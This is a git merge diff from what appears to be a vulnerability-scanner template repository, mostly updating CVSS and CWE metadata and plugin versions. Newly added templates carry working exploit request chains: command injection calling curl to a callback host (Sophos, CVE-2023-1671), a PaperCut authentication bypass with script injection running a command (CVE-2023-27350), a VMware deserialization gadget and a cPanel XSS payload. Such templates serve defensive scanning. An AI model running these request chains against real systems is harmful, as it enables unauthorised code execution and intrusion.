Merge branch 'main' into add-max-request

2023-04-29 13:32:16 +05:30 · 2023-04-29 13:32:16 +05:30 · 28f4302dcd
parent 1f5b1f2c47 41cd2a2802
commit 28f4302dcd
83 changed files with 915 additions and 201 deletions
--- a/.new-additions
+++ b/.new-additions
@ -1,7 +1,14 @@
 http/cves/2020/CVE-2020-27481.yaml
 http/cves/2021/CVE-2021-30175.yaml
+http/cves/2023/CVE-2023-1671.yaml
+http/cves/2023/CVE-2023-20864.yaml
+http/cves/2023/CVE-2023-27350.yaml
 http/cves/2023/CVE-2023-27524.yaml
+http/cves/2023/CVE-2023-29489.yaml
 http/cves/2023/CVE-2023-29922.yaml
+http/default-logins/powerjob-default-login.yaml
 http/exposed-panels/papercut-ng-panel.yaml
 http/exposed-panels/proxmox-panel.yaml
 http/exposed-panels/sophos-web-appliance.yaml
+http/osint/mail-archive.yaml
+http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
--- a/dns/dmarc-detect.yaml
+++ b/dns/dmarc-detect.yaml
@ -1,14 +1,18 @@
 id: dmarc-detect

 info:
-  name: DNS DMARC Detection
+  name: DNS DMARC - Detect
  author: juliosmelo
  severity: info
  description: |
-    DMARC is an open email authentication protocol that provides domain-level protection of the email channel. DMARC authentication detects and prevents email spoofing techniques used in phishing, business email compromise (BEC) and other email-based attacks.
+    DNS DMARC information was detected.
  reference:
    - https://dmarc.org/
    - https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  tags: dns,dmarc
  metadata:
    max-request: 1
@ -22,3 +26,5 @@ dns:
        group: 1
        regex:
          - "IN\tTXT\t(.+)"
+
+# Enhanced by md on 2023/04/20
--- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt
+++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
@ -1 +1 @@
-4.3.5.1
+4.3.6.1
--- a/helpers/wordpress/plugins/cookie-law-info.txt
+++ b/helpers/wordpress/plugins/cookie-law-info.txt
@ -1 +1 @@
-3.0.8
+3.0.9
--- a/helpers/wordpress/plugins/kadence-blocks.txt
+++ b/helpers/wordpress/plugins/kadence-blocks.txt
@ -1 +1 @@
-3.0.34
+3.0.36
--- a/helpers/wordpress/plugins/loginizer.txt
+++ b/helpers/wordpress/plugins/loginizer.txt
@ -1 +1 @@
-1.7.8
+1.7.9
--- a/helpers/wordpress/plugins/members.txt
+++ b/helpers/wordpress/plugins/members.txt
@ -1 +1 @@
-3.2.4
+3.2.5
--- a/helpers/wordpress/plugins/newsletter.txt
+++ b/helpers/wordpress/plugins/newsletter.txt
@ -1 +1 @@
-7.6.9
+7.7.0
--- a/helpers/wordpress/plugins/post-smtp.txt
+++ b/helpers/wordpress/plugins/post-smtp.txt
@ -1 +1 @@
-2.4.8
+2.4.9
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@ -1 +1 @@
-4.9.53
+4.9.54
--- a/helpers/wordpress/plugins/sg-security.txt
+++ b/helpers/wordpress/plugins/sg-security.txt
@ -1 +1 @@
-1.4.1
+1.4.3
--- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
+++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
@ -1 +1 @@
-2.5.0
+2.5.1
--- a/helpers/wordpress/plugins/wordpress-importer.txt
+++ b/helpers/wordpress/plugins/wordpress-importer.txt
@ -1 +1 @@
-0.8
+0.8.1
--- a/helpers/wordpress/plugins/wp-fastest-cache.txt
+++ b/helpers/wordpress/plugins/wp-fastest-cache.txt
@ -1 +1 @@
-1.1.4
+1.1.5
--- a/helpers/wordpress/plugins/wp-google-maps.txt
+++ b/helpers/wordpress/plugins/wp-google-maps.txt
@ -1 +1 @@
-9.0.18
+9.0.19
--- a/http/cves/2002/CVE-2002-1131.yaml
+++ b/http/cves/2002/CVE-2002-1131.yaml
@ -14,10 +14,10 @@ info:
    - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
    - https://nvd.nist.gov/vuln/detail/CVE-2002-1131
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cwe-id: CWE-80
    cve-id: CVE-2002-1131
-    cwe-id: NVD-CWE-Other
-    cvss-score: 7.5
  tags: cve2002,edb,xss,squirrelmail,cve
  metadata:
    max-request: 5
--- a/http/cves/2010/CVE-2010-5286.yaml
+++ b/http/cves/2010/CVE-2010-5286.yaml
@ -12,10 +12,10 @@ info:
    - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
  remediation: Upgrade to a supported version.
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
-    cve-id: CVE-2010-5286
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
    cwe-id: CWE-22
-    cvss-score: 10.0
+    cve-id: CVE-2010-5286
  tags: cve,cve2010,joomla,lfi,edb,packetstorm
  metadata:
    max-request: 1
--- a/http/cves/2012/CVE-2012-0991.yaml
+++ b/http/cves/2012/CVE-2012-0991.yaml
@ -11,10 +11,10 @@ info:
    - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/
    - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N
-    cvss-score: 3.5
-    cve-id: CVE-2012-0991
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
    cwe-id: CWE-22
+    cve-id: CVE-2012-0991
  tags: lfi,openemr,traversal,edb,cve,cve2012
  metadata:
    max-request: 1
--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@ -12,10 +12,10 @@ info:
    - https://bugs.php.net/bug.php?id=61910
    - http://www.php.net/ChangeLog-5.php#5.4.2
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
-    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
    cve-id: CVE-2012-1823
-    cwe-id: CWE-20
  tags: cve2012,kev,vulhub,rce,php,cve
  metadata:
    max-request: 1
--- a/http/cves/2013/CVE-2013-2248.yaml
+++ b/http/cves/2013/CVE-2013-2248.yaml
@ -3,7 +3,7 @@ id: CVE-2013-2248
 info:
  name: Apache Struts - Multiple Open Redirection Vulnerabilities
  author: 0x_Akoko
-  severity: low
+  severity: medium
  description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
  reference:
    - https://www.exploit-db.com/exploits/38666
@ -12,10 +12,10 @@ info:
    - http://struts.apache.org/release/2.3.x/docs/s2-017.html
  remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
-    cvss-score: 5.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-601
    cve-id: CVE-2013-2248
-    cwe-id: CWE-20
  tags: cve,cve2013,apache,redirect,struts,edb
  metadata:
    max-request: 1
--- a/http/cves/2014/CVE-2014-2383.yaml
+++ b/http/cves/2014/CVE-2014-2383.yaml
@ -13,10 +13,10 @@ info:
    - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
    - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
-    cvss-score: 4.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
    cve-id: CVE-2014-2383
-    cwe-id: CWE-200
  metadata:
    max-request: 11
    verified: "true"
--- a/http/cves/2014/CVE-2014-3120.yaml
+++ b/http/cves/2014/CVE-2014-3120.yaml
@ -12,10 +12,10 @@ info:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-3120
    - http://bouk.co/blog/elasticsearch-rce/
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
-    cvss-score: 6.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
    cve-id: CVE-2014-3120
-    cwe-id: CWE-284
  tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic
  metadata:
    max-request: 1
--- a/http/cves/2014/CVE-2014-4940.yaml
+++ b/http/cves/2014/CVE-2014-4940.yaml
@ -1,19 +1,19 @@
 id: CVE-2014-4940

 info:
-  name: WordPress Plugin Tera Charts - Directory Traversal
+  name: WordPress Plugin Tera Charts - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
+  description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4940
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=
    - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
-    cve-id: CVE-2014-4940
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
    cwe-id: CWE-22
-    cvss-score: 5.0
+    cve-id: CVE-2014-4940
  metadata:
    max-request: 1
    google-query: inurl:"/wp-content/plugins/tera-charts"
--- a/http/cves/2014/CVE-2014-5111.yaml
+++ b/http/cves/2014/CVE-2014-5111.yaml
@ -1,19 +1,19 @@
 id: CVE-2014-5111

 info:
-  name: Fonality trixbox - Directory Traversal
+  name: Fonality trixbox - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
+  description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
  reference:
    - https://www.exploit-db.com/exploits/39351
    - https://nvd.nist.gov/vuln/detail/CVE-2014-5111
    - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
-    cve-id: CVE-2014-5111
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
    cwe-id: CWE-22
-    cvss-score: 5.0
+    cve-id: CVE-2014-5111
  tags: packetstorm,cve,cve2014,lfi,trixbox,edb
  metadata:
    max-request: 1
--- a/http/cves/2015/CVE-2015-0554.yaml
+++ b/http/cves/2015/CVE-2015-0554.yaml
@ -11,10 +11,10 @@ info:
    - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
    - http://www.exploit-db.com/exploits/35721
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-200
    cve-id: CVE-2015-0554
-    cwe-id: CWE-264
-    cvss-score: 9.4
  tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015
  metadata:
    max-request: 1
--- a/http/cves/2015/CVE-2015-1427.yaml
+++ b/http/cves/2015/CVE-2015-1427.yaml
@ -11,10 +11,10 @@ info:
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1427
    - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585
  classification:
-    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
-    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
    cve-id: CVE-2015-1427
-    cwe-id: CWE-284
  tags: cve,cve2015,elastic,rce,elasticsearch,kev
  metadata:
    max-request: 2
--- a/http/cves/2017/CVE-2017-16894.yaml
+++ b/http/cves/2017/CVE-2017-16894.yaml
@ -1,16 +1,17 @@
 id: CVE-2017-16894

 info:
-  name: Laravel framework < 5.5.21 - Infomation Disclosure
+  name: Laravel <5.5.21 - Information Disclosure
  author: j4vaovo
  severity: high
  description: |
-    In Laravel framework through 5.5.21, remote attackers can obtain sensitive information (such as externally usable passwords) via a direct request for the /.env URI. NOTE: this CVE is only about Laravel framework's writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting the .env permissions. The .env filename is not used exclusively by Laravel framework.
+    Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894
    - https://packetstormsecurity.com/files/cve/CVE-2017-16894
    - http://whiteboyz.xyz/laravel-env-file-vuln.html
    - https://twitter.com/finnwea/status/967709791442341888
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-16894
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
@ -46,3 +47,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/20
--- a/http/cves/2018/CVE-2018-8715.yaml
+++ b/http/cves/2018/CVE-2018-8715.yaml
@ -1,7 +1,7 @@
 id: CVE-2018-8715

 info:
-  name: AppWeb Authentication Bypass vulnerability
+  name: AppWeb - Authentication Bypass
  author: milo2012
  severity: high
  description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
@ -9,11 +9,12 @@ info:
    - https://github.com/embedthis/appweb/issues/610
    - https://blogs.securiteam.com/index.php/archives/3676
    - https://security.paloaltonetworks.com/CVE-2018-8715
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8715
  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
+    cwe-id: CWE-1391
    cve-id: CVE-2018-8715
-    cwe-id: CWE-287
  tags: cve,cve2018,appweb,auth-bypass
  metadata:
    max-request: 1
@ -35,3 +36,5 @@ http:
        words:
          - '<a class="logo" href="https://embedthis.com/">&nbsp;</a>'
        part: body
+
+# Enhanced by cs 04/25/2023
--- a/http/cves/2021/CVE-2021-35250.yaml
+++ b/http/cves/2021/CVE-2021-35250.yaml
@ -5,18 +5,19 @@ info:
  author: johnk3r,pdteam
  severity: high
  description: |
-    A researcher reported a Directory Traversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.
+    SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/rissor41/SolarWinds-CVE-2021-35250
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-35250
    - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US
    - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250
    - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35250
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35250
    cwe-id: CWE-22
+  remediation: Resolved in Serv-U 15.3 Hotfix 1.
  metadata:
    max-request: 1
    shodan-query: product:"Rhinosoft Serv-U httpd"
@ -41,3 +42,5 @@ http:
      - type: status
        status:
          - 401
+
+# Enhanced by md on 2023/04/20
--- a/http/cves/2022/CVE-2022-0776.yaml
+++ b/http/cves/2022/CVE-2022-0776.yaml
@ -3,7 +3,7 @@ id: CVE-2022-0776
 info:
  name: RevealJS postMessage <4.3.0 - Cross-Site Scripting
  author: LogicalHunter
-  severity: high
+  severity: medium
  description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.
  reference:
    - https://hackerone.com/reports/691977
@ -11,10 +11,10 @@ info:
    - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0776
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cwe-id: CWE-80
    cve-id: CVE-2022-0776
-    cwe-id: CWE-79
-    cvss-score: 6.1
  tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs

 headless:
--- a/http/cves/2023/CVE-2023-1671.yaml
+++ b/http/cves/2023/CVE-2023-1671.yaml
@ -0,0 +1,42 @@
+id: CVE-2023-1671
+
+info:
+  name: Sophos Web Appliance - Remote Code Execution
+  author: Co5mos
+  severity: critical
+  description: |
+    A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
+  reference:
+    - https://vulncheck.com/blog/cve-2023-1671-analysis
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1671
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-1671
+    cwe-id: CWE-77
+  metadata:
+    verified: "true"
+    fofa-query: title="Sophos Web Appliance"
+    shodan-query: title:"Sophos Web Appliance"
+  tags: cve,cve2023,rce,sophos,oast
+
+http:
+  - raw:
+      - |
+        POST /index.php?c=blocked&action=continue HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: curl/7.86.0
+
+        args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"
--- a/http/cves/2023/CVE-2023-20864.yaml
+++ b/http/cves/2023/CVE-2023-20864.yaml
@ -0,0 +1,51 @@
+id: CVE-2023-20864
+
+info:
+  name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: critical
+  description: |
+    VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.
+  reference:
+    - https://www.vmware.com/security/advisories/VMSA-2023-0007.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-20864
+  metadata:
+    verified: true
+    shodan-query: title:"vRealize Log Insight"
+  tags: cve,cve2023,vmware,aria,rce,oast
+
+requests:
+  - raw:
+      - |
+        GET /csrf HTTP/1.1
+        Host: {{Hostname}}
+        X-Csrf-Token: Fetch
+
+      - |
+        POST /api/v2/internal/cluster/applyMembership HTTP/1.1
+        Host: {{Hostname}}
+        X-CSRF-Token: {{xcsrftoken}}
+        Content-type: application/octet-stream
+
+        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - '"errorMessage":"Internal error'
+
+    extractors:
+      - type: kval
+        internal: true
+        name: xcsrftoken
+        group: 1
+        kval:
+          - "X_CSRF_Token"
--- a/http/cves/2023/CVE-2023-24737.yaml
+++ b/http/cves/2023/CVE-2023-24737.yaml
@ -1,20 +1,20 @@
 id: CVE-2023-24737

 info:
-  name: PMB v7.4.6 - Cross Site Scripting
+  name: PMB v7.4.6 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
-    PMB v7.4.6 allows an attacker to make a Reflected XSS on export_z3950.php endpoint via the same query parameter.
+    PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.
  reference:
    - https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-24737
    - https://github.com/AetherBlack/CVE/tree/main/PMB
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-24737
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cwe-id: CWE-80
    cve-id: CVE-2023-24737
-    cwe-id: CWE-79
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1469328760
@ -42,3 +42,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by cs 04/25/2023
--- a/http/cves/2023/CVE-2023-27159.yaml
+++ b/http/cves/2023/CVE-2023-27159.yaml
@ -1,15 +1,19 @@
 id: CVE-2023-27159

 info:
-  name: Appwrite <= 1.2.1 - Server-Side Request Forgery
+  name: Appwrite <=1.2.1 - Server-Side Request Forgery
  author: DhiyaneshDk
  severity: medium
  description: |
-    Appwrite up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /v1/avatars/favicon. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.
+    Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://gist.github.com/b33t1e/43b26c31e895baf7e7aea2dbf9743a9a
    - https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27159
  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-918
    cve-id: CVE-2023-27159
  metadata:
    max-request: 1
@ -33,3 +37,5 @@ http:
        part: interactsh_request
        words:
          - "User-Agent: Appwrite-Server"
+
+# Enhanced by md on 2023/04/20
--- a/http/cves/2023/CVE-2023-27350.yaml
+++ b/http/cves/2023/CVE-2023-27350.yaml
@ -0,0 +1,129 @@
+id: CVE-2023-27350
+
+info:
+  name: PaperCut - Unauthenticated Remote Code Execution
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: critical
+  description: |
+    This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
+  reference:
+    - https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27350
+    - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
+    - https://www.zerodayinitiative.com/advisories/ZDI-23-233/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-27350
+    cwe-id: CWE-284
+    epss-score: 0.0117
+  metadata:
+    verified: "true"
+    shodan-query: http.html:"PaperCut"
+  tags: cve,cve2023,papercut,rce,oast,unauth,kev
+
+variables:
+  cmd: "nslookup {{interactsh-url}}"
+
+http:
+  - raw:
+      - |
+        GET /app?service=page/SetupCompleted HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /app HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login
+
+      - |
+        POST /app HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go
+
+      - |
+        POST /app HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update
+
+      - |
+        POST /app HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go
+
+      - |
+        POST /app HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update
+
+      - |
+        GET /app?service=page/PrinterList HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=page%2FPrinterList
+
+      - |
+        POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}
+
+      - |
+        POST /app HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4
+
+      - |
+        POST /app HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        service=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply
+
+    cookie-reuse: true
+    host-redirects: true
+    max-redirects: 2
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: printerID
+        group: 1
+        regex:
+          - 'erList\/selectPrinterCost&amp;sp=([a-z0-9]+)">'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - 'Avanceret kontering'
--- a/http/cves/2023/CVE-2023-29489.yaml
+++ b/http/cves/2023/CVE-2023-29489.yaml
@ -0,0 +1,29 @@
+id: CVE-2023-29489
+
+info:
+  name: cPanel - Cross-Site Scripting
+  author: DhiyaneshDk
+  severity: medium
+  reference: https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/
+  metadata:
+    verified: "true"
+    shodan-query: title:"cPanel"
+  tags: cve,cve2023,cpanel,xss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
+          - 'Invalid webcall ID:'
+        condition: and
